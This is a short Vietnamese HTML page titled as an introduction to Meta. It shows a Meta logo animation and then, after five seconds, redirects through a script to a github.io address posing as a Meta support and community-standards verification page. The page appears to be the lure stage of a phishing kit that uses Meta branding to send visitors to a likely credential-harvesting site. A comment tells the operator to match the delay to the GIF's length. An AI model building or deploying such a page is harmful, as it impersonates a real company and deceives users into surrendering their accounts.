<!DOCTYPE html>
<html lang="vi">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Giới thiệu Meta</title>
  <style>
    html, body {
      margin: 0;
      padding: 0;
      height: 100%;
      display: flex;
      justify-content: center;
      align-items: center;
      background-color: #ffffff;
    }
    #intro img {
      width: 100%;
      height: 100%;
      object-fit: contain;
    }
  </style>
</head>
<body>
  <div id="intro">
    <img src="meta-logo.gif" alt="Meta Logo Animation" />
  </div>

  <script>
    // Thời gian chuyển hướng sau khi ảnh GIF chạy xong (ví dụ: 5000 ms = 5 giây)
    setTimeout(function() {
      window.location.href = "https://supportcenter-verifypage.github.io/community-standard-102973838/";
    }, 5000); // ⚠️ Bạn cần chỉnh thời gian này đúng với thời lượng của GIF
  </script>
</body>
</html>


